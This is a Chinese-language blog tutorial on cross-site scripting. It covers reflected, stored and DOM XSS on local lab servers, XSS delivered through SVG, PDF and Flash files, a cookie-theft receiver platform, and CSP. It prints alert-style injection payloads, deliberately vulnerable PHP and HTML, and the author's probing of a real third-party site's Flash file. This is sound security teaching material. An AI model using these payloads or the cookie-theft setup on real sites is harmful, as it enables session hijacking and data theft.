

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/phone_icon/hacker.png">
  <link rel="icon" href="/img/browser_icon/hacker.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="0z-sIHN">
  <meta name="keywords" content="">
  
    <meta name="description" content="漏洞原理XSS 攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为 XSS，XSS 是一种在 web 应用中的计算机安全漏洞，它允许恶意 web 用户将代码植入到 web网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生 xss 攻击 重点在于输入和输出 渗透测试手册WEB安全漏洞.pdf 漏洞类型反射">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS漏洞🦠">
<meta property="og:url" content="http://example.com/2024/03/26/XSS%E6%BC%8F%E6%B4%9E%F0%9F%A6%A0/index.html">
<meta property="og:site_name" content="0z-sIHN 的博客">
<meta property="og:description" content="漏洞原理XSS 攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为 XSS，XSS 是一种在 web 应用中的计算机安全漏洞，它允许恶意 web 用户将代码植入到 web网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生 xss 攻击 重点在于输入和输出 渗透测试手册WEB安全漏洞.pdf 漏洞类型反射">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/essay_cover_img/xss.png">
<meta property="article:published_time" content="2024-03-26T13:31:43.000Z">
<meta property="article:modified_time" content="2024-11-10T14:45:45.353Z">
<meta property="article:author" content="0z-sIHN">
<meta property="article:tag" content="WEB攻防">
<meta property="article:tag" content="XSS漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/essay_cover_img/xss.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>XSS漏洞🦠 - 0z-sIHN 的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0z-sIHN Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>联系我</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/essay_top_cover_bg/office.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="XSS漏洞🦠"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-26 21:31" pubdate>
          2024年3月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          45 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">XSS漏洞🦠</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h1><p>XSS 攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为 XSS，XSS 是一种在 web 应用中的计算机安全漏洞，它允许恶意 web 用户将代码植入到 web网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生 xss 攻击</p>
<p>重点在于<strong>输入和输出</strong></p>
<p><a href="assets/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%89%8B%E5%86%8CWEB%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E-20240327132410-5mt5mil.pdf">渗透测试手册WEB安全漏洞.pdf</a></p>
<h1 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h1><h2 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a>反射型</h2><p>非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面</p>
<p>常见情况是攻击者通过<strong>构造一个恶意链接的形式</strong>，诱导<strong>用户传播和打开</strong>，由于链接内所携带的参数会回显于页面中或作为页面的处理数据源，最终造成XSS攻击。</p>
<p><img src="/assets/image-20240804160714-i2rfx6i.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h5 id="简单案例"><a href="#简单案例" class="headerlink" title="简单案例"></a>简单案例</h5><p>xss.php</p>
<p><img src="/assets/image-20240804161124-ypuz97i.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<ol>
<li><p>设置x值为什么，相应就会解析执行什么</p>
<p> <img src="/assets/image-20240804161224-h0cis5h.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>利用嵌套js格式，生成嵌套网址：192.168.137.1:84&#x2F;xss.php?x&#x3D;<iframe src="http://www.xiaodi8.com">test</iframe></p>
</li>
<li><p>如果这段代码被插入到一个网页中，并且该网页的用户受到攻击者的控制，那么该用户的浏览器将加载 <a target="_blank" rel="noopener" href="http://www.xiaodi8.com/">http://www.xiaodi8.com</a> 这个地址，并在页面中嵌入一个 &lt;&#x2F;iframe&#x2F;&gt; 元素，显示该地址的内容。</p>
<p> <img src="/assets/image-20240804161250-yrdqiwe.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>那么就可能导致跨站脚本攻击。攻击者可能会尝试利用这种方式来窃取用户的信息、劫持用户会话，或者进行其他恶意活动。</p>
</li>
</ol>
<p>‍</p>
<ul>
<li><p>需要注意的问题</p>
<ol>
<li><p>真实的XSS攻击语句，需要考<strong>虑输入和输入的格式</strong></p>
</li>
<li><p><strong>输入可能会有过滤，输出可能会有其他符号的拼接造成攻击语句执行失败</strong></p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">//反射型</span><br><span class="hljs-variable">$code</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;x&#x27;</span>];<br><span class="hljs-comment">//echo $code;</span><br>**<span class="hljs-comment">//模拟成接受图片显示图片</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;img src=<span class="hljs-subst">$code</span>&gt;&quot;</span>;**<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li><p>可能会造成如下的：<strong>攻击语句存在导致格式问题不能被正常解析和执行</strong></p>
<p> <img src="/assets/image-20240804161431-4r6jtwf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 查看源码</p>
<p> <img src="/assets/image-20240804161454-vi8kmkx.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>解决方式：使用特定的语句进行替换，如<code>x onerror=&quot;alert(1)&quot;</code>​如果你将 <code>onerror=&quot;alert(1)&quot;</code>​ 嵌入到某个 HTML 元素中，那么当该元素加载失败时（例如图像加载失败、脚本加载失败等），JavaScript 中的 <code>alert(1)</code>​ 将会被执行，弹出一个带有 “1” 的警告框。</p>
<p> <img src="/assets/image-20240804161604-9fd6ek5.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240804161619-zl13g5j.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<h2 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h2><p>持久化，代码是存储在<strong>服务器中</strong>的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。</p>
<p><img src="/assets/image-20240804160737-7gd5wxl.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h5 id="简单案例-1"><a href="#简单案例-1" class="headerlink" title="简单案例"></a>简单案例</h5><ul>
<li><p>打开之前创建的留言板功能，依据ip访问<a target="_blank" rel="noopener" href="http://192.168.88.1:82/gbook.php">http://192.168.88.1:82/gbook.php</a></p>
</li>
<li><p>将xss攻击写入在用户名处==：<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>​== 内容随便填写，然后提交</p>
</li>
<li><p><strong>发现每次访问页面的时候，都会弹出1的提示框，说明xss攻击成功</strong></p>
<p><img src="/assets/image-20240804161930-pjychor.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240804162151-70jv22t.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h2 id="DOM型"><a href="#DOM型" class="headerlink" title="DOM型"></a>DOM型</h2><p>不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS</p>
<p>通过修改原始的客户端代码，受害者浏览器的DOM环境改变，导致有效载荷的执行。<br>页面本身没有变化，<strong>但由于DOM环境被恶意修改，有客户端代码被包含进了页面并执行。</strong></p>
<p><img src="/assets/image-20240804160820-0f0ku4i.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<ol>
<li><p><strong>寻找可操纵的DOM元素</strong>： 攻击者会寻找页面上的DOM元素，例如URL参数、cookie、用户输入等，这些DOM元素的值可能会被动态地嵌入到页面中。</p>
</li>
<li><p><strong>构造恶意载荷</strong>： 攻击者通过在寻找到的DOM元素中注入恶意代码，构造出一个特殊的输入值。这个输入值在后续被浏览器解释执行时，将导致恶意代码执行。</p>
</li>
<li><p><strong>修改DOM环境</strong>： 攻击者通过修改DOM元素的值，或者在页面中插入特殊的HTML或脚本标签，改变了原始的DOM环境。</p>
</li>
<li><p><strong>触发和执行</strong>： 当<strong>页面加载或用户与页面交互时，浏览器解析修改后的DOM环境，执行了包含恶意代码的DOM元素，导致攻击生效。</strong></p>
</li>
<li><p><strong>经常出现 dom xss 的关键语句</strong></p>
<ul>
<li><p><code>document.referer</code>​ 属性</p>
</li>
<li><p><code>window.name</code>​ 属性</p>
</li>
<li><p><code>location</code>​ 属性</p>
</li>
<li><p><code>innerHTML</code>​ 属性</p>
</li>
<li><p><code>documen.write</code>​ 属性</p>
</li>
</ul>
</li>
</ol>
<h5 id="简单案例-2"><a href="#简单案例-2" class="headerlink" title="简单案例"></a>简单案例</h5><ul>
<li><p>创建对应的html代码，</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-comment">&lt;!-- </span><br><span class="hljs-comment">    dom-xss-test 页面</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">    1. 设置页面标题为 &quot;dom-xss-test&quot;。</span><br><span class="hljs-comment">    2. 引入 jQuery 库，版本为 1.6.1。</span><br><span class="hljs-comment">    3. 利用 JavaScript 检查当前 URL 的哈希部分。</span><br><span class="hljs-comment">    4. 如果存在哈希部分，提取其中的 URL，并将页面重定向到该 URL。</span><br><span class="hljs-comment">--&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br>    <span class="hljs-comment">&lt;!-- 设置页面标题 --&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>dom-xss-test<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><br><br>    <span class="hljs-comment">&lt;!-- 引入 jQuery 库 --&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;https://code.jquery.com/jquery-1.6.1.min.js&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><br>    <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript">        <span class="hljs-comment">// JavaScript 代码</span></span><br><span class="language-javascript">        <span class="hljs-keyword">var</span> hash = location.<span class="hljs-property">hash</span>;</span><br><span class="language-javascript"></span><br><span class="language-javascript">        <span class="hljs-comment">// 如果 URL 中有哈希部分</span></span><br><span class="language-javascript">        <span class="hljs-keyword">if</span>(hash)&#123;</span><br><span class="language-javascript">            <span class="hljs-comment">// 提取 URL</span></span><br><span class="language-javascript"><span class="hljs-comment">//hash.substring(1): 对 hash 字符串调用 substring(1) 方法。</span></span><br><span class="language-javascript"><span class="hljs-comment">//substring 方法用于提取字符串的一部分，参数为开始索引。</span></span><br><span class="language-javascript"><span class="hljs-comment">//在这里，从索引 1 开始提取，即去掉了 # 号。</span></span><br><span class="language-javascript">            <span class="hljs-keyword">var</span> url = hash.<span class="hljs-title function_">substring</span>(<span class="hljs-number">1</span>);</span><br><span class="language-javascript"></span><br><span class="language-javascript">            <span class="hljs-comment">// 重定向页面到提取的 URL</span></span><br><span class="language-javascript">            location.<span class="hljs-property">href</span> = url;</span><br><span class="language-javascript">        &#125;</span><br><span class="language-javascript">    </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br>    <span class="hljs-comment">&lt;!-- 页面主体内容 --&gt;</span><br>    dom xss test.<br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure></li>
<li><p>通过URL访问该页面<a target="_blank" rel="noopener" href="http://192.168.137.1:84/domxss.html#%E5%B9%B6%E5%9C%A8%60#%60%E2%80%8B%E5%90%8E%E9%9D%A2%E8%B7%9F%E4%B8%8A%EF%BC%8C%E6%83%B3%E8%A6%81%E8%B7%B3%E8%BD%AC%E7%9A%84%E9%A1%B5%E9%9D%A2%EF%BC%8C%E8%AE%BF%E9%97%AE%E5%8D%B3%E5%8F%AF%E6%88%90%E5%8A%9F%E8%B7%B3%E8%BD%AC">http://192.168.137.1:84/domxss.html#并在`#`​后面跟上，想要跳转的页面，访问即可成功跳转</a></p>
<p><img src="/assets/image-20240804162818-p2scaj1.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ul>
<p>‍</p>
<h2 id="结合文件上传"><a href="#结合文件上传" class="headerlink" title="结合文件上传"></a>结合文件上传</h2><h3 id="SVG"><a href="#SVG" class="headerlink" title="SVG"></a>SVG</h3><p>SVG(Scalable Vector Graphics)是一种基于XML的二维矢量图格式，和我们平常用的jpg&#x2F;png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失，并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它，目前主流的浏览器都已经支持SVG图片的渲染。</p>
<p><img src="/assets/image-20240804181952-l1vzyns.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240804182008-cbq2bmm.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>创建SVG格式的图片，并在源代码中加入<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>​ xss弹窗代码，每当访问打开此文件时候，自动弹出弹窗</p>
<p><img src="/assets/image-20240804182132-2xtxzzf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240804182153-bh3zv3e.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>也可将此文件上传至文件上传页面，然后访问上传后生成的url，每次点击都会触发</p>
<p>类似这种</p>
<p><img src="/assets/image-20240804182628-k1ez8j1.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h3 id="PDF"><a href="#PDF" class="headerlink" title="PDF"></a>PDF</h3><p>这里使用迅捷PDF编辑器</p>
<ol>
<li><p>创建PDF，加入动作JS</p>
<ol>
<li><p>打开PDF编辑器，创建新文档</p>
<p> <img src="/assets/image-20240804183411-ufizanu.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>从视图选项中开启页面缩略图</p>
<p> <img src="/assets/image-20240804183429-kat23xd.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>点击第一个缩略图，右键选中属性</p>
<p> <img src="/assets/image-20240804183442-9e7nmh5.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>在右侧页面属性中依次找到动作→开始动作→点击三个点</p>
<p> <img src="/assets/image-20240804183458-tqu1swy.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>&#x3D;&#x3D;点击新增→运行JavaScript→&#x3D;&#x3D;​&#x3D;&#x3D;<strong>添加Xss弹窗语句</strong>&#x3D;&#x3D;​&#x3D;&#x3D;<strong>​<code>app.alert(1)</code>​</strong>&#x3D;&#x3D; ​</p>
<p> <img src="/assets/image-20240804183511-1c1cbkd.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
</li>
<li><p>通过文件上传获取直链</p>
<p> <img src="/assets/image-20240804182628-k1ez8j1.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>直链地址访问后被触发（这里用的是Edge，火狐不行）</p>
<p> <img src="/assets/image-20240804183657-jzocb5r.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
<p>‍</p>
<h3 id="FLASH"><a href="#FLASH" class="headerlink" title="FLASH"></a>FLASH</h3><p>需要下载Flash中心以及FlashCS6</p>
<ol>
<li><p>制作swf-xss文件</p>
<ol>
<li><p>新建swf文件，可以使用软件提供的模板</p>
<p> <img src="/assets/image-20240804184552-449luxm.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>F9进入代码区域，并植入代码</p>
 <figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs dart"><span class="hljs-comment">//取m参数</span><br><span class="hljs-keyword">var</span> m=_root.m;<br><span class="hljs-comment">//调用html中Javascript中的m参数值</span><br>flash.<span class="hljs-keyword">external</span>.ExternalInterface.call(m);<br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240804184617-z7ipfzj.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 这个时候Ctrl+Enter检查是否有报错</p>
<p> 报错内容</p>
<p> <img src="/assets/image-20240804184538-eumb1lg.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>属性发布设置解析，并点击发布到桌面</p>
<p> 点击发布设置，<strong>将脚本设置为：</strong>​&#x3D;&#x3D;<strong>ActionScript 2.0</strong>&#x3D;&#x3D;​ <strong>（置入代码仅支持2.0，否则会报错）</strong></p>
<p> <img src="/assets/image-20240804184824-a5zk8ou.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>将发布在桌面==（创建好的携带Xss攻击的swf文件），<strong>存放在部署好的网址源码下，并进行访问</strong>。使用触发Xss触发语句，成功弹窗<strong>弹出Xss攻击弹窗</strong></p>
<p> <img src="/assets/image-20240804184940-2kaqa35.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240804184945-bjcjfyi.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
</li>
<li><p>测试swf文件xss安全性</p>
<p> xss一是指执行恶意js，那么为什么说flash xss呢？</p>
<p> 是因为flash有可以调用js的函数，也就是可以和js通信，因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有：<strong>getURL，navigateToURL，</strong>​<strong>ExternalInterface.call</strong>（最常见） <strong>，htmlText，loadMovie</strong>等等</p>
<p> 这里使用ffdec反编译</p>
<p> <img src="/assets/image-20240804185329-he62fhf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 测试网站<a target="_blank" rel="noopener" href="https://www.acg-123.org/images/uploader.swf%EF%BC%8C%E8%AE%BF%E9%97%AE%E5%B9%B6%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6">https://www.acg-123.org/images/uploader.swf，访问并下载文件</a></p>
<ol>
<li><p>利用JPEXS Free Flash Decompiler工具，反编译swf文件,并查找<strong>ExternalInterface.call</strong>函数</p>
<p> <img src="/assets/image-20240804190112-ncvo9sq.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>查看源码发现<code>this.jsobject = this.loaderInfo.parameters[&quot;jsobject&quot;];</code>​，<strong>程序并未写死可以读取任意传递回来的jsobject</strong></p>
<p> <img src="/assets/image-20240804190129-xd4t2f4.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>直接使用分析出的触发点，进行输入Xss攻击语句,这里在本地测试,也可以直接在网站上测试</p>
<p> <img src="/assets/image-20240804190509-vao1f2j.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
</ol>
</li>
</ol>
<p>‍</p>
<p>‍</p>
<h2 id="Cookie盗取"><a href="#Cookie盗取" class="headerlink" title="Cookie盗取"></a>Cookie盗取</h2><p>搭建xss平台,使用payload直接插入存在有xss漏洞的地方即可</p>
<p>xss平台搭建：<a target="_blank" rel="noopener" href="https://github.com/epoch99/BlueLotus/_XSSReceiver-master">https://github.com/epoch99/BlueLotus\_XSSReceiver-master</a></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h2 id="网络钓鱼"><a href="#网络钓鱼" class="headerlink" title="网络钓鱼"></a>网络钓鱼</h2><p>部署可访问的钓鱼页面并修改</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h2 id="框架控制"><a href="#框架控制" class="headerlink" title="框架控制"></a>框架控制</h2><p>只需执行JS文件，即可实现对当前浏览器的控制，可配合各类手法利用<br>缺点：如果对方浏览器关闭，权限就会掉</p>
<p>‍</p>
<p>‍</p>
<h2 id="CSP"><a href="#CSP" class="headerlink" title="CSP"></a>CSP</h2><blockquote>
<p>CSP (Content Security Policy 内容安全策略)  各种语言都存在，只不过设置不同<br>内容安全策略是一种可信白名单机制，来限制网站中是否可以包含某来源内容。<br>该制度明确告诉客户端，哪些外部资源可以加载和执行，<strong>等同于提供白名单(当外部资源不在白名单内，禁止网站访问外部资源)</strong> ，<br>它的实现和执行全部由浏览器完成，开发者只需提供配置。<br>禁止加载外域代码，防止复杂的攻击逻辑。<br>禁止外域提交，网站被攻击后，用户的数据不会泄露到外域。<br>禁止内联脚本执行（规则较严格，目前发现 GitHub 使用）。<br>禁止未授权的脚本执行（新特性，Google Map 移动版在使用）。<br>合理使用上报可以及时发现XSS，利于尽快修复问题。</p>
</blockquote>
<p><img src="/assets/image-20240811172351-8whjx6h.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240811172320-p3mydcb.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>启用csp策略之后</p>
<p><img src="/assets/image-20240811172730-otrnodt.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240811172812-zew9jbf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>并且xss平台也不会收到相关cookie信息</p>
<p>‍</p>
<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h3><p>存在绕过方式，但是大都比较鸡肋，因为条件比较苛刻</p>
<p>文章：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12370">https://xz.aliyun.com/t/12370</a></p>
<p>‍</p>
